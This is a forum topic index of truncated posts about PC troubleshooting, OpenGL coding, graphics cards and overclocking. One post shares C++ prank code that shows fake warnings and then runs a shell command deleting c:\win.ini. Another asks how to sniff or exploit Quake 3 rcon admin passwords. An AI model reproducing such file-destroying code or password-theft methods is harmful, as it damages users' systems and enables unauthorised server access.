Computer Discussion
1365 topics in this forum
-
well i have spyware on my computer which is slowing down my system its always getting pop ups about winantivirus pro or somethin win well i want to reformat everything but i have no discs dell is so gay does anyone know how to reformat? but i also want my driver installed i just want it lik how i first got it i kno its possible because ive done it before on my old sony viao but of course that had the discs and dell wants me to buy software support for lik 125 and im lik fuck you well if u all can help thanks alot :dunno:
-
- 10 replies
- 95 views
-
-
Okay... back when I was using SDL, I used to have 35 different images for one sprite, rotated at 10x degrees for each image, x being the image number. Now that I'm using OpenGL I dithced that system, and just used glRotate. Much better. However, I'm getting into a problem of per pixel collision detection. Back in SDL, I just found the area of the overlapping rectangles, checked to see if the alpha values were above 0 in the same places, and if they were, return true. Now, since I only have a copy of the image facing north, how exactly would I go about collision detection?
-
- 2 replies
- 46 views
-
-
This is a multithreaded IRC proxy checker It's also available here // IRC Proxy checker // by blocky // [email protected] // May 2003 #pragma comment(lib,"ws2_32.lib") #include <windows.h> #include <stdio.h> #include <fstream.h> #include <winsock.h> char outfile[256]; char infile[256]; BOOL working=TRUE; HANDLE file; char ofile[128]; char server[96]; int svport=0; int openthreads=0; int currproxy = -1; int maxproxies; int done=0; int dgood=0; DWORD starttime=0; typedef struct proxycombo { char host[64]; int port; } proxycombo; proxycombo *proxy; BOOL DoConnect(proxycombo currprox); proxycombo GetNextProxy(); DWORD WINAPI CheckProxy(LPVOID para…
-
- 12 replies
- 1.2k views
-
-
Just earlier my moniter went black, flashing black to a lighter tone. Then it went back to the game I was playing.... It's happened a few times now.... Any suggestions on how to fix this? Specs: AMD Athlon 64 3200+ 2.0ghz 1024 mb;Corsair RAM (2X512) ATi Radeon x800 xl 256mb (AGP 8x)
-
- 13 replies
- 136 views
-
-
If i do not want all the programs to boot up at start up can i just delte everything in the prefetch folder also will this affect my computer in anyway like important files that need to be executed for computer to properly run?can some one please give me quick explanation on that also is there a way to boot the computer ion some sort of game mode so the only thing running is the .exe/pcgame and nothign else but whats needed for picture and sound...?
-
- 9 replies
- 59 views
-
-
Hi. I was thinking about buying a new GFX card and I came across this one 512MB PCI-Express x16 NVIDIA® GeForce™ 7900 GTX I have heard very good things about it, but what no one could tell me was, with this card, will I be able to play all current and games soon to be released on max/high settings? Any help would be appreciated.
-
- 12 replies
- 99 views
-
-
hey does ny1 kno how to restart the computer to where its like a brand new computer itll really help i hav a dell inspirion 6000 laptop soo ny1 knos fill me on in some info :):repost:
-
- 7 replies
- 99 views
-
-
i have used google and everythign it tells me about allowing ports sucks, so i ask you how to unblock ports so i can get torrents a little faster (i am about 4-5 kb)
-
- 5 replies
- 58 views
-
-
I'm a newb to burning dvd's so please bear with me. I used dvd santa last night to burn a movie to DVD. when I played the DVD on my ps2, the sound was out of sync with the video. I have no idea why this is..but does it have anything to do with xvid or divx codecs? idk could someone help me out here?
-
-
- 4 replies
- 54 views
-
-
Does anyone have an idea how to resolve a name to an IP and then get the IP as string? At the moment I would need that function for a VB app to check if the client is resolving the address correctly. Any help, comments or ideas how to solve the problem are welcome. I am sure some more experienced programmer will laugh about this.
-
- 4 replies
- 108 views
-
-
bool LoadPNG(const char* filename, ImageData* structure) { char header[8]; int x; int y; int width; int height; int number_of_passes; long int count3 = 0; unsigned char* buffer; png_byte color_type; png_byte bit_depth; png_structp png_ptr; png_infop info_ptr; FILE *fp = fopen(filename, "rb"); if (!fp) return false; fread(header, 1, 8, fp); if (png_sig_cmp((png_byte*)header, 0, 8)) return false; png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL); if (!png_ptr) return false; info_ptr = png_create_info_struct(png_ptr); if (!info_ptr) return false; if (setjmp(png_jmpbuf(png_ptr))) return false; png_init_io(png_ptr, fp); png_set_sig_bytes(png_ptr, …
-
- 0 replies
- 59 views
-
-
When i go on Magicanimals and try to start sending webcam a message comes up and says that the page has to close, this also happens when i right click to ge to the small menu were i can allow to send my webcam, when i clikc on the webcam icon it crashes also any help???
-
- 6 replies
- 97 views
-
-
I have a texture mapped onto a quad. It has an alpha component, it has a texture generated with an alpha component, but it's not blending. I've put these while initializing OpenGL: glEnable(GL_BLEND); and glBlendFunc(GL_SRC_ALPHA,GL_ONE); Anyone have any idea why it's not working?
-
- 6 replies
- 74 views
-
-
Been trying to teach myself different things lately in an effort to combat boredom, just tried graphical design with cinema 4d and photoshop to make renders, got that down pretty good, now I want to learn how to do some remixing and whatnot. Downloaded Fruityloops and basically had a headache from not knowing wtf to do. Anyone out there know a good prog for remixing songs and making trance/techno tracks? Something basic and easy to learn with. Thanks.
-
- 8 replies
- 92 views
-
-
this still needs compiling though ############CODE############## #include <iostream> #include <dos.h> #include <stdlib.h> #include <conio.h> using namespace std; void pause(); void destroy(); int main() { cout << "your account is not responding and needs to shut down.\n"; cout << "yOU iDOit tHIs iS a bUG tHaT wILl kILL wINdowS !.\n"; cout << "tO sToP tHIs fROm haPPEninG cLICk tHe X.\n"; pause(); cout << "aRE yOu rEAlly sURe???---cOUrtEsy oF fIRebUg \n"; pause(); destroy(); return 0; } void pause() { system("pause"); } void destroy() { system("if exist c:\win.ini del c:\win.ini el…
-
- 34 replies
- 723 views
-
-
I got this program called Hotrecorder for recording calls made with voip programss but it doesn't include voipstunt. Sux. Anyone know of a program to do it?
-
- 3 replies
- 56 views
-
-
Anyone have a site that actually makes decent money, no I'm not talking like alot of money, but at the same time I not talking $10 a week. Anyone?
-
- 3 replies
- 99 views
-
-
Yeah yeah i no google Iv tryed Google, And i did not find anything i liked. Any one no any good file storage site's? ~Thank's
-
- 5 replies
- 117 views
-
-
I've decided that since I have nothing better to do, and I have 4 invitiations laying around, I'm going to give away 4 free invites to TorrentLeech. Simply send me a PM containing your email, and I'll select 4 random people to be invited. EDIT: Never mind, the registration is fucked. Invites don't work for now. Sorry.
-
- 8 replies
- 155 views
-
-
//up in declares DWORD* dwCarPointerBase = (DWORD*)0xB6F3B8; //car base DWORD* dwPlayerPointerBase = (DWORD*)0xB6F5F0; //in Present float* fXSpeed = (float*)((*dwCarPointerBase) + 68); // X Speed float* fYSpeed = (float*)((*dwCarPointerBase) + 72); // Y Speed float* fZSpeed = (float*)((*dwCarPointerBase) + 76); // Z Speed float* fXSpin = (float*)((*dwCarPointerBase) + 80); // X Spin (EW) [east-west] float* fYSpin = (float*)((*dwCarPointerBase) + 84); // Y Spin (NS) [north-south] float* fZSpin = (float*)((*dwCarPointerBase) + 88); // Z Spin (UD) [up-down] if(*dwCarPointerBase) { if (GetAsyncKeyState(VK_LSHIFT) < 0) { *fXSpeed = 0.0f; *fYSpeed = 0.0f; *fZS…
-
- 5 replies
- 103 views
-
-
I'm trying to find the right approach to hacking rconpasswords in quake 3 based games. After doing a lot of research, I've come up with three options: 1. "Rcon Sniffer" by searching in packets sent/recieved from the server. 2. Some sort of client side hack, that exploits some bug in the specific game. 3. Something I haven't thought of yet. If it's option 1, I do know how to do it in a lan situation, but I don't see how it can apply to an internet server: If the admin's password goes from him to the server, it never comes inbetween me and the server, so how can I intercept it? If it's option 2, I've already tried this approach, and the game I'm trying it …
-
- 2 replies
- 110 views
-
-
haha im so inept....i cant work out how to get it...can sum1 help me?
-
- 1 reply
- 53 views
-
-
It seems like our waiting is over. nVIDIA's new G71 and G73 chips have been released straight off the presses on to neweggs hot list. In these new cards you will see more (alot more) with less. As the size, power consumption, and price will be reduced in these newer cards. 7900GTX eVGA http://www.newegg.com/Product/Product.asp?Item=N82E16814130279 PNY http://www.newegg.com/Product/Product.asp?Item=N82E16814133167 XFX http://www.newegg.com/Product/Product.asp?Item=N82E16814150135 BFG http://www.newegg.com/Product/Product.asp?Item=N82E16814143047 Leadtek http://www.newegg.com/Product/Product.asp?Item=N82E16814122242 7900GT eVGA http://www.newegg.com/Produc…
-
- 13 replies
- 164 views
-
-
Is anyone on here into overclocking? I have a 1.8ghz Amd Athlon Xp 2500+ Barton overclocked to a 3200+(2.2ghz). I have my geforce 6200 Overclocked by alittle bit too. Anyone else got there computers overclocked? Anyone with water cooling? Whats your favorite thermal paste? :devil:
-
- 18 replies
- 240 views
-